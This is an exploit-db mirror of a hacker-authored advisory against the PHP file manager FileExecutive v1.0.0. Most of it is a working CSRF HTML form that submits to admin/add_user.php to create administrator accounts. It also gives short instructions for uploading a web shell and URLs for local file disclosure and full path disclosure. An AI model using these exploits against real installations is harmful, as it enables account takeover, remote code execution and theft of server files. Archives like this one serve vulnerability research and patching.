exploit-db-mirror/platforms/aix/webapps/11580.txt
Offensive Security 5a468df6b9 Updated 12_08_2013
2013-12-08 16:08:13 +00:00

77 lines
No EOL
3.6 KiB
Text
Executable file
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

==============================================================================
[»] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist ,Golden-z3r0 ,Shr7 Team . ]
==============================================================================
[»] FileExecutive Multiple Vulnerabilities
==============================================================================
[»] Script: [ FileExecutive v1.0.0 ]
[»] Language: [ PHP ]
[»] Site page: [ FileExecutive is a web-based file manager written in PHP. ]
[»] Download: [ http://sourceforge.net/projects/fileexecutive/ ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.Org ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
###########################################################################
===[ Exploits ]===
Add/Edit Admin CSRF:
<html>
<head>
<title>FileExecutive Remote Add Admin Exploit [By:MvM]</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<form action='http://localhost/scripts/file/admin/add_user.php' method='POST' onSubmit='return chk(this)'>
<th colspan='5'>Add A user<hr></th>
<td>Username:</td>
<input type='text' name='username' value='' maxlength='32' onkeyup="showHint(this.value)">
<Br>
<td>Password:</td>
<input type='text' name='password' value=''>
<Br>
<td>Name:</td>
<input type='text' name='name' value='' maxlength='32'>
<Br>
<td>Root Directory:</td>
<input type='text' name='root' value='' maxlength='200'>
<Br>
<td>Max Upload Size:</td>
<input type='text' name='uload_maxsize' value='' size='8'>
<Br>
<select name='multiplier'>
<option value='1' selected>Bytes</option>
<option value='1024'>KB</option>
<option value='1048576'>MB</option>
</select>
<td>Group:</td><td><select name='groupid' id='groupid'><option value='0' selected>No Group</option></select></td>
<td>Use Group permissions?</td><td>Yes:<input type='radio' name='grp_perms' value='1'></td><td>No:<input type='radio' name='grp_perms' value='0' id="abc" checked></td>
<td>Is user Admin?</td><td>Yes:<input type='radio' name='admin' value='1'></td><td>No:<input type='radio' name='admin' value='0' id="abc" checked>
<td colspan='2'><fieldset><legend>Permissions</legend>
<td><input type='checkbox' name='mkfile' value='1'>Create File</td> <td><input type='checkbox' name='mkdir' value='1'>Create Folder</td>
<td><input type='checkbox' name='uload' value='1'>Upload</td> <td><input type='checkbox' name='rename' value='1'>Rename</td>
<td><input type='checkbox' name='delete' value='1'>Delete</td> <td><input type='checkbox' name='edit' value='1'>Edit</td>
<td><input type='checkbox' name='dload' value='1'>Download</td> <td><input type='checkbox' name='chmod' value='1'>Chmod</td>
<td><input type='checkbox' name='move' value='1'>Move</td> <td> </td></tr>
<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
</form>
</body>
</html>
Shell Upload:
[»] By Go To The End Of Page & Browse Your Shell 2 upload it <-=- Remote File Upload Vulnerability
Local File Disclosure:
[»] http://localhost/[path]/download.php?file=./LFD <-=- Local File Disclosure Vulnerability
Full Path Disclosure:
[»] http://localhost/[path]/listdir.php?dir=./FPD <-=- Full Path Disclosure Vulnerability
Author: ViRuSMaN <-
###########################################################################